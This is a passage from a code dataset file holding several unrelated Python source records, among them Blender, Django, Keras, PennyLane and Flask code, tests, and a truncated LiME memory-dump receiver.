controllers.append(bpy.context.scene.objects.active)\n #empty index list so enable update of controller\n for ctrl in controllers:\n sensors = [obj.name for obj in objects if obj.MARStype == 'sensor']\n motors = [obj.name for obj in objects if obj.MARStype == 'motor']\n ctrl['sensors'] = sorted(sensors, key=str.lower)\n ctrl['motors'] = sorted(motors, key=str.lower)\n print(\"Added joints to (new) controller(s).\")\n #for prop in mtdefs.controllerProperties[self.controller_type]:\n # for ctrl in controllers:\n # ctrl[prop] = mtdefs.controllerProperties[prop]\n return {'FINISHED'}\n\n\nclass AddLegacyControllerOperator(Operator):\n \"\"\"AddControllerOperator\"\"\"\n bl_idname = \"object.mt_add_legacy_controller\"\n bl_label = \"Add a node-dependent controller\"\n bl_options = {'REGISTER', 'UNDO'}\n\n controller_scale = FloatProperty(\n name = \"controller_scale\",\n default = 0.05,\n description = \"scale of the controller visualization\")\n\n def execute(self, context):\n location = bpy.context.scene.cursor_location\n objects = []\n controllers = []\n for obj in bpy.context.selected_objects:\n if obj.MARStype == \"controller\":\n controllers.append(obj)\n else:\n objects.append(obj)\n if len(controllers) <= 0:\n mtutility.createPrimitive(\"controller\", \"sphere\", self.controller_scale, mtdefs.layerTypes[\"sensor\"], \"controller\", location)\n bpy.context.scene.objects.active.MARStype = \"controller\"\n 
bpy.context.scene.objects.active.name = \"controller\"\n controllers.append(bpy.context.scene.objects.active)\n #empty index list so enable update of controller\n for ctrl in controllers:\n for key in ctrl.keys():\n if key.find(\"index\") >= 0:\n del ctrl[key]\n print(\"Deleting \" + key + \" in \" + ctrl.name)\n i = 1\n for obj in objects:\n if obj.MARStype == \"link\":\n ctrl[\"index\"+(str(i) if i >= 10 else \"0\"+str(i))] = obj.name\n i += 1\n print(\"Added joints to (new) controller(s).\")\n #for prop in mtdefs.controllerProperties[self.controller_type]:\n # for ctrl in controllers:\n # ctrl[prop] = mtdefs.controllerProperties[prop]\n return {'FINISHED'}\n","sub_path":"scripts/blender/marstools/mtcontrollers.py","file_name":"mtcontrollers.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89989951","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom .models import Custom, VideoImage\nfrom .serializer import CustomSerializer,VideoImageSerializer\nfrom rest_framework.response import Response\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, Http404\nfrom rest_framework import status\n\nclass LastCustom(APIView):\n def get(self,response):\n last_file = Custom.objects.all()\n if last_file:\n last_file = last_file[0]\n last_file = CustomSerializer(last_file)\n return Response(last_file.data)\n return Response([])\n\nclass LastVideoImage(APIView): \n def get(self,response):\n last_file = VideoImage.objects.all()\n if last_file:\n last_file = last_file[0]\n last_file = VideoImageSerializer(last_file)\n return Response(last_file.data)\n return Response([])\n\n\ndef downloadCustom(request,id):\n try:\n archivo = get_object_or_404(Custom, id=id)\n contents = archivo.file\n name_file = archivo.name\n response = HttpResponse(contents)\n\n response['Content-Disposition'] = 'attachment; filename={}'.format(name_file)\n return response\n\n except Exception as e:\n if type(e) is Http404:\n return Response(False, status=status.HTTP_404_NOT_FOUND)\n else:\n return Response({\"detail\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\ndef downloadVideoImage(request,id):\n try:\n archivo = get_object_or_404(VideoImage, id=id)\n contents = archivo.file\n name_file = archivo.name\n response = HttpResponse(contents)\n\n response['Content-Disposition'] = 'attachment; filename={}'.format(name_file)\n return response\n\n except Exception as e:\n if type(e) is Http404:\n return Response(False, status=status.HTTP_404_NOT_FOUND)\n else:\n return Response({\"detail\": str(e)}, status=status.HTTP_400_BAD_REQUEST)","sub_path":"Actualizations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"386193015","text":"#!/usr/bin/env python3\n\n# Define favorite languages\nfav_lang = {\n 'fred':'c',\n 'janna':'java',\n 'link':'lua',\n 'mark':'c#',\n 'john':'assembly',\n 'thuan':'python',\n 'selena':'java',\n 'thuan':'c',\n 'komos':'ruby',\n 'vicktor':'c++',\n }\n\n# Define friends list\nfriends = [\n 'janna', 'mark', 'komos', 'scott', 'amelie', 'ashley', 'rachel',\n 'benjamin', 'thuan', 'selena', 'vicktor'\n ]\n\nfor name,lang in fav_lang.items():\n if name in friends:\n print(\"Hi \" + name.title() +\n \", I see your favorite language is \" +\n lang.title() + \"!\\n\"\n )\n \nfor friend in friends:\n if friend not in 
fav_lang.keys():\n print(friend.title() + \", please take our poll.\\n\")\n","sub_path":"Crash_Course/6.4-6.6/6-6_polling.py","file_name":"6-6_polling.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"31741261","text":"import unittest\nimport neuralpy\n\n\nclass associatingElementsTest(unittest.TestCase):\n\n\tdef test_cost_function(self):\n\t\t#tuples are arranged as ((input1, input2), expected_output)\n\t\tcases = [((1.0, 1.0), 0.0),\n\t\t\t\t((1.0, 0.5), 0.125),\n\t\t\t\t((0.5, 1.0), 0.125),\n\t\t\t\t((0.25, 0.0), 0.03125),\n\t\t\t\t((0.0, 0.25), 0.03125)\n\t\t\t]\t\n\t\tfor case in cases:\n\t\t\tinput1 = case[0][0]\n\t\t\tinput2 = case[0][1]\n\t\t\toutput = case[1]\n\t\t\tself.assertEqual(neuralpy.cost_function(input1, input2), output)\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"neuralpy/tests/test_neural.py","file_name":"test_neural.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63172401","text":"\"\"\"Script to scrape the data and place it to database\"\"\"\nimport subprocess\nimport sys\nfrom pymongo import MongoClient\nfrom pymongo.errors import BulkWriteError\nfrom news.scraping.sites.rss import GoogleRss\n\n\nMONGO_CLIENT = 'mongodb://localhost:27017/'\nNEWS_DB_NAME = 'news-db'\nCOLLECTION_NAME = 'google-rss'\nDEFAULT_DUMP_FILE = 'news.csv'\n\ndef get_documents(feed):\n \"\"\"Transform newsfeed to list of documents to paste\n\n Params\n ------\n feed\n scrapable news source\n \"\"\"\n\n news = feed.scrape()\n return [onenew.document() for onenew in news]\n\ndef load_documents(collection, news):\n \"\"\"Save news to mongo db collection\n\n Params\n ------\n collection\n mongo db collection\n news\n list of news documents to save\n \"\"\"\n\n try:\n collection.insert_many(news, ordered=False)\n except BulkWriteError:\n pass\n\ndef start_mongo():\n \"\"\"Starts mongo db\"\"\"\n\n try:\n subprocess.run(['mongod'], check=True)\n except subprocess.CalledProcessError:\n print('Failed, but most likely mongo is already started')\n\ndef dump_csv():\n \"\"\"Dumps mongo collection to csv\"\"\"\n\n csv_file = input(f'Which file? 
({DEFAULT_DUMP_FILE})\\n') \\\n or DEFAULT_DUMP_FILE\n\n cmd = [\n 'mongoexport',\n f'--collection={COLLECTION_NAME}',\n f'--db={NEWS_DB_NAME}',\n f'--out={csv_file}',\n f'--uri={MONGO_CLIENT}',\n '--type=csv',\n '--fields=pubtime,title,link,description,body'\n ]\n\n subprocess.run(cmd, check=True)\n\ndef ask(collection, feed):\n \"\"\"User interface\n\n Params\n ------\n collection\n mongo db collection\n feed\n scrapable news source\n \"\"\"\n\n question = 'What do you want?\\n' \\\n '[0] - run mongo\\n' \\\n '[1] - scrape site\\n' \\\n '[2] - dump data\\n' \\\n '[q] - exit\\n'\n\n answer = input(question)\n if answer == '0':\n start_mongo()\n elif answer == '1':\n news = get_documents(feed)\n load_documents(collection, news)\n elif answer == '2':\n dump_csv()\n elif answer == 'q':\n sys.exit()\n\n\nif __name__ == \"__main__\":\n client = MongoClient(MONGO_CLIENT)\n newsdb = client[NEWS_DB_NAME]\n googlecoll = newsdb[COLLECTION_NAME]\n newsfeed = GoogleRss()\n\n while True:\n ask(googlecoll, newsfeed)\n","sub_path":"entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"149361304","text":"#!/usr/bin/env python\n\ndef init_solvent_db():\n\n import os\n import glob\n from . import Solvents\n path = os.path.join(os.path.dirname(Solvents.__file__), 'data','solventlib')\n print(\"Building solvent database...\")\n dbpath = os.path.join(path, 'SOLVENTS.db')\n configfilelist = glob.glob(os.path.join(path, '*.config'))\n maker=Solvents.SolventManager()\n for conffile in configfilelist:\n print('Adding solvent from {}'.format(conffile))\n maker.saveSolvent(maker.createSolvent(conffile), db=dbpath, createEmpty=True)\n if os.path.exists(dbpath): print(\"DONE creating solvent DB\")\n\n","sub_path":"pyMDMix/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"417571830","text":"from dask.distributed import Client\nimport time\nfrom pennylane import numpy as np\nimport pennylane as qml\nimport qnetvo as qnet\n\n# local imports\nfrom context import src\n\n\"\"\"\nThis script considers the bilocal scenario with white noise detectors errors applied\nto each detector.\n\nWe consider errors where the constant value 0/1 are output with equal probability when\nthe detector errors occur.\nWe scan through the values [0,1] for errors on each detector.\nFor each pair of error rates (p1,p2), we optimize pure state preparations\nand projective measurements for maximal violation of the CHSH scenario.\n\nWe consider Bell state preparations and arbitrary state preparations.\n\"\"\"\n\nif __name__ == \"__main__\":\n\n max_ent_prep_nodes = [\n qnet.PrepareNode(1, [0, 1], qnet.max_entangled_state, 3),\n qnet.PrepareNode(1, [2, 3], qnet.max_entangled_state, 3),\n ]\n ghz_prep_nodes = [\n qnet.PrepareNode(1, [0, 1], qnet.ghz_state, 0),\n qnet.PrepareNode(1, [2, 3], qnet.ghz_state, 0),\n ]\n arb_prep_nodes = [\n qnet.PrepareNode(1, [0, 1], qml.ArbitraryStatePreparation, 6),\n qnet.PrepareNode(1, [2, 3], qml.ArbitraryStatePreparation, 6),\n ]\n\n local_rot_meas_nodes = [\n qnet.MeasureNode(2, 2, [0], src.local_rot, 3),\n qnet.MeasureNode(2, 2, [1, 2], src.local_rot, 6),\n qnet.MeasureNode(2, 2, [3], src.local_rot, 3),\n ]\n local_ry_meas_nodes = [\n qnet.MeasureNode(2, 2, [0], qnet.local_RY, 1),\n qnet.MeasureNode(2, 2, [1, 2], qnet.local_RY, 2),\n 
qnet.MeasureNode(2, 2, [3], qnet.local_RY, 1),\n ]\n arb_meas_nodes = [\n qnet.MeasureNode(2, 2, [0], src.local_rot, 3),\n qnet.MeasureNode(2, 2, [1, 2], qml.ArbitraryUnitary, 15),\n qnet.MeasureNode(2, 2, [3], src.local_rot, 3),\n ]\n\n white_noise_error_map = np.array([[0.5, 0.5], [0.5, 0.5]])\n\n scan_range = np.arange(0, 1.001, 0.05)\n\n # preparing noise parameters for use with dask.distributed\n params_range = np.zeros((3, len(scan_range)))\n for i, gamma in enumerate(scan_range):\n params_range[:, i] = [gamma] * 3\n\n data_filepath = \"data/bilocal/uniform_detector_white_noise/\"\n client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # \"\"\"\n # # max entangled preparations local rot\n # \"\"\"\n # time_start = time.time()\n # max_ent_local_rot_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(max_ent_prep_nodes, local_rot_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.4,\n # \"num_steps\": 40,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # max_ent_local_rot_opt_jobs = client.map(max_ent_local_rot_state_optimization, *params_range)\n # max_ent_local_rot_opt_dicts = client.gather(max_ent_local_rot_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"max_ent_local_rot_\",\n # scan_range,\n # max_ent_local_rot_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n # \"\"\"\n # # minimal optimal ansatz\n # \"\"\"\n # client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # time_start = time.time()\n # ghz_local_ry_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(ghz_prep_nodes, local_ry_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.4,\n # \"num_steps\": 40,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # ghz_local_ry_opt_jobs = client.map(ghz_local_ry_state_optimization, *params_range)\n # ghz_local_ry_opt_dicts = client.gather(ghz_local_ry_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"ghz_local_ry_\",\n # scan_range,\n # ghz_local_ry_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n # \"\"\"\n # # max entangled prep arb meas\n # \"\"\"\n # client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # time_start = time.time()\n # max_ent_arb_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(max_ent_prep_nodes, arb_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.2,\n # \"num_steps\": 50,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # max_ent_arb_opt_jobs = client.map(max_ent_arb_state_optimization, *params_range)\n # max_ent_arb_opt_dicts = client.gather(max_ent_arb_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"max_ent_arb_\",\n # scan_range,\n # max_ent_arb_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n # \"\"\"\n # arb prep local rot meas\n # \"\"\"\n # client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n # time_start = 
time.time()\n # arb_local_rot_state_optimization = src.detector_error_opt_fn(\n # qnet.NetworkAnsatz(arb_prep_nodes, local_rot_meas_nodes),\n # src.detector_error_chain_cost_fn,\n # cost_kwargs={\n # \"error_map\": white_noise_error_map,\n # },\n # opt_kwargs={\n # \"step_size\": 1.2,\n # \"num_steps\": 60,\n # \"sample_width\": 5,\n # \"verbose\": False,\n # },\n # )\n\n # arb_local_rot_opt_jobs = client.map(arb_local_rot_state_optimization, *params_range)\n # arb_local_rot_opt_dicts = client.gather(arb_local_rot_opt_jobs)\n\n # print(\"optimization time : \", time.time() - time_start)\n\n # src.save_optimizations_one_param_scan(\n # data_filepath,\n # \"arb_local_rot_\",\n # scan_range,\n # arb_local_rot_opt_dicts,\n # quantum_bound=np.sqrt(2),\n # classical_bound=1,\n # )\n\n \"\"\"\n arb prep arb meas\n \"\"\"\n client = Client(processes=True, n_workers=5, threads_per_worker=1)\n\n time_start = time.time()\n arb_arb_state_optimization = src.detector_error_opt_fn(\n qnet.NetworkAnsatz(arb_prep_nodes, arb_meas_nodes),\n src.detector_error_chain_cost_fn,\n cost_kwargs={\"error_map\": white_noise_error_map,},\n opt_kwargs={\"step_size\": 1, \"num_steps\": 80, \"sample_width\": 5, \"verbose\": False,},\n )\n\n arb_arb_opt_jobs = client.map(arb_arb_state_optimization, *params_range)\n arb_arb_opt_dicts = client.gather(arb_arb_opt_jobs)\n\n print(\"optimization time : \", time.time() - time_start)\n\n src.save_optimizations_one_param_scan(\n data_filepath,\n \"arb_arb_\",\n scan_range,\n arb_arb_opt_dicts,\n quantum_bound=np.sqrt(2),\n classical_bound=1,\n )\n","sub_path":"script/bilocal/uniform_detector_white_noise.py","file_name":"uniform_detector_white_noise.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"17018219","text":"#!/usr/bin/python\nimport os, sys\n\nnode_ext = \"node.html\"\nfunc_ext = \"func.html\"\n\nif __name__ == '__main__':\n dump_dir = \".\"\n len_node_ext = len(node_ext)\n len_func_ext = len(func_ext)\n node_list = []\n func_list = []\n etc_list = []\n png_file = None\n for e in os.listdir(dump_dir):\n if (len(e) > len_node_ext) and (e[-len_node_ext:]==node_ext):\n node_list.append(e)\n elif (len(e) > len_func_ext) and (e[-len_func_ext:]==func_ext):\n func_list.append(e)\n elif (len(e) > 5) and (e[-5:] == '.html'):\n etc_list.append(e)\n elif (png_file == None) and (len(e) > 4) and (e[-4:] == '.png'):\n png_file = e\n print(node_list)\n print(\"===\")\n print(func_list)\n print(\"===\")\n print(etc_list)\n # create index.html\n findex = open(\"index.html\", 'w')\n findex.write('\\n')\n findex.write('INDEX\\n')\n findex.write('\\n')\n if (png_file != None):\n findex.write('Control flow graph\\n'%png_file) \n findex.write('
<br>\\n')\n findex.write('<h2>Functions</h2>\\n')\n for fn in func_list:\n findex.write('<a href=\"%s\">%s</a><br>\\n'%(fn, fn))\n findex.write('<br>\\n')\n findex.write('<h2>CFG Nodes</h2>\\n')\n for n in node_list:\n findex.write('<a href=\"%s\">%s</a><br>\\n'%(n,n))\n findex.write('<br>\\n')\n findex.write('<h2>Exit/Start/Call nodes</h2>\\n')\n for n in etc_list:\n findex.write('<a href=\"%s\">%s</a><br>\\n'%(n,n))\n findex.write('</body>\\n')\n findex.write('</html>')\n findex.close()\n \n \n","sub_path":"mkhtmlindex.py","file_name":"mkhtmlindex.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"10189445","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# (c) Copyright 2019 Enric Moreu. All Rights Reserved.\n\nimport time\nstart = time.time()\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom keras import callbacks\nfrom keras import optimizers\nfrom utils.telegram import send\n\nexperiment = '2.9.0.final'\n\ntrain_path = '/data/resized_224/train'\nvalidation_path = '/data/resized_224/validation'\ntest_path = '/data/resized_224/test'\nepochs = 50\nsteps_per_epoch = 300\nvalidation_steps=50\nbatch_size = 32\nlr=5e-6\ndecay=0\n\n## Load data + augmentation\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n zoom_range=0.2,\n rotation_range=20)\n\n\ntrain_generator = train_datagen.flow_from_directory(\n train_path,\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary') \n\nvalidation_datagen = ImageDataGenerator(\n rescale=1./255)\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_path,\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary')\n\ntest_datagen = ImageDataGenerator(\n rescale=1./255)\n\ntest_generator = test_datagen.flow_from_directory(\n test_path,\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary')\n\n## Define model\n\nmodel = Sequential()\nmodel.add(Conv2D(64, (3, 3), input_shape=(224,224,3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(256, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(256, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(256, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(512, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(4096))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(4096))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\n## Define optimizer\nopt = optimizers.Adam(lr=lr,decay=decay)\n\nmodel.compile(loss = 'binary_crossentropy',\n optimizer = opt,\n metrics = ['accuracy'])\n\n## Callbacks\n\n# Tensorboard\ntbCallBack = callbacks.TensorBoard(log_dir='/code/logs/{}'.format(experiment))\n\n# Checkpoints\ncheckpoints = callbacks.ModelCheckpoint('/code/checkpoints/{}.weights'.format(experiment), monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=False, mode='auto', period=1)\n\n## Train model\nmodel.fit_generator(\n 
train_generator,\n epochs=epochs,\n steps_per_epoch=steps_per_epoch,\n validation_steps=validation_steps,\n validation_data=validation_generator,\n callbacks=[\n tbCallBack,\n checkpoints\n ],\n shuffle=True,\n verbose=1,\n workers=4,\n use_multiprocessing=True)\n\n## Evaluate model\n\n# Load best model\nbest_model = load_model('/code/checkpoints/{}.weights'.format(experiment))\n\n\n# Forward test images\nresults = best_model.evaluate_generator(test_generator,\n workers=4,\n use_multiprocessing=True)\n\nend = time.time()\ntotal_time = (end - start)\n\nsend('''Experiment {} finished in {} seconds\nLR: {}\nTest accuracy: {}\n'''.format(experiment, int(total_time), lr, '%.2f'%(results[1]*100)))","sub_path":"src/model/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"561997381","text":"class Solution(object):\n def maxDepth(self, root):\n if root == None:\n return 0\n depth = 0\n stack = [root]\n while stack:\n next_level = []\n while stack:\n node = stack.pop()\n if node.children:\n next_level += node.children #此处不能使用 append method\n stack = next_level\n depth += 1\n return depth","sub_path":"559.py","file_name":"559.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396909397","text":"import traceback\n\nfrom flask import Blueprint\nfrom flask_restful import request, current_app\nfrom ml_enabler.utils import err\nfrom ml_enabler.models.utils import NotFound\nfrom flask_login import login_required\nfrom ml_enabler.services.token_service import TokenService\nfrom flask import jsonify\nfrom flask_login import current_user\n\ntoken_bp = Blueprint(\"token_bp\", __name__)\n\n\n@login_required\n@token_bp.route(\"/v1/user/token\", methods=[\"GET\"])\ndef list():\n \"\"\"\n List tokens for the given user session\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token List\n \"\"\"\n try:\n tokens = TokenService.list(current_user.id)\n return jsonify(tokens), 200\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n\n\n@login_required\n@token_bp.route(\"/v1/user/token\", methods=[\"POST\"])\ndef post():\n \"\"\"\n Create a new Token\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token\n \"\"\"\n try:\n token_payload = request.get_json()\n token_payload[\"uid\"] = current_user.id\n return TokenService.create(token_payload), 200\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n\n\n@login_required\n@token_bp.route(\"/v1/user/token/\", methods=[\"GET\"])\ndef get(token_id):\n \"\"\"\n Get a specific Token\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token\n \"\"\"\n try:\n return TokenService.get(current_user.id, token_id)\n except NotFound:\n return err(404, \"No Token Found\"), 404\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n\n\n@login_required\n@token_bp.route(\"/v1/user/token/\", methods=[\"DELETE\"])\ndef delete(token_id):\n \"\"\"\n Delete a specific Token\n ---\n produces:\n - application/json\n responses:\n 200:\n description: Token\n \"\"\"\n try:\n return 
TokenService.delete(current_user.id, token_id)\n except NotFound:\n return err(404, \"No Token Found\"), 404\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n\n error_msg = f\"Unhandled error: {str(e)}\"\n return err(500, error_msg), 500\n","sub_path":"ml_enabler/api/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"52052631","text":"# Copyright (c) 2018, INRIA\n# Copyright (c) 2018, University of Lille\n# All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\nimport logging\n\nfrom multiprocessing import Queue\n\nimport pytest\n\nfrom mock import Mock\nfrom powerapi.report import Report\nfrom powerapi.puller import PullerActor\nfrom powerapi.message import StartMessage, ErrorMessage\nfrom powerapi.filter import Filter\n\nfrom ..actor.abstract_test_actor import AbstractTestActor\nfrom ..db_utils import FakeDB, AbstractTestActorWithDB, define_database_content, REPORT1, REPORT2\n\n\ndef define_filter(filt):\n \"\"\"\n Decorator to set the _filt\n attribute for individual tests.\n \"\"\"\n def wrap(func):\n setattr(func, '_filter', filt)\n return func\n return wrap\n\n\ndef pytest_generate_tests(metafunc):\n \"\"\"\n Function called by pytest when collecting a test_XXX function\n\n define the content fixtures in test environement with collected the\n value _content if it exist or with an empty content\n\n :param metafunc: the test context given by pytest\n \"\"\"\n if 'content' in metafunc.fixturenames:\n content = getattr(metafunc.function, '_content', None)\n if isinstance(content, list):\n metafunc.parametrize('content', [content])\n else:\n metafunc.parametrize('content', [[]])\n\n\n if 'filt' in metafunc.fixturenames:\n filt = getattr(metafunc.function, '_filter', None)\n metafunc.parametrize('filt', [filt])\n\n\nclass FakeDispatcher:\n\n def __init__(self):\n self.q = Queue()\n\n def send_data(self, report):\n self.q.put(report, block=False)\n\n\nclass TestPuller(AbstractTestActorWithDB):\n\n 
@pytest.fixture\n def fake_dispatcher(self):\n return FakeDispatcher()\n\n @pytest.fixture\n def fake_filter(self, fake_dispatcher):\n fake_filter = Mock()\n fake_filter.filters = [(Mock(return_value=True), Mock())]\n fake_filter.route = Mock(return_value=[fake_dispatcher])\n fake_filter.get_type = Mock(return_value=Report)\n return fake_filter\n\n @pytest.fixture\n def actor(self, fake_db, filt, fake_filter):\n filter = fake_filter if filt is None else filt\n return PullerActor('puller_test', fake_db, filter, 0, level_logger=logging.DEBUG)\n\n @define_database_content([REPORT1, REPORT2])\n def test_start_actor_with_db_thath_contains_2_report_make_actor_send_reports_to_dispatcher(self, started_actor, fake_dispatcher, content):\n for report in content:\n assert fake_dispatcher.q.get(timeout=2) == report\n\n def test_starting_actor_in_stream_mode_make_it_terminate_itself_after_empty_db(self, started_actor):\n started_actor.join(2)\n assert started_actor.is_alive() is False\n\n @define_filter(Filter())\n def test_send_start_message_to_puller_without_filter_answer_with_error_message(self, init_actor):\n init_actor.send_control(StartMessage())\n msg = init_actor.receive_control(2000)\n assert isinstance(msg, ErrorMessage)\n","sub_path":"tests/unit/puller/test_puller_actor.py","file_name":"test_puller_actor.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"586294449","text":"import socket\nimport os\nfrom datetime import datetime\n\nfrom conf import LIME_PORT\nfrom elastic_util import ElasticUtil\n\n# Receive dump from client\ndef recv_dump(ip):\n\n try:\n output_dir = os.path.join(os.getcwd(), 'Dumps')\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n output_path = os.path.join(output_dir, datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\") + \" - \" + ip + \".lime\")\n with open(output_path, 'wb') as out:\n try:\n s = socket.socket(socket.AF_INET, 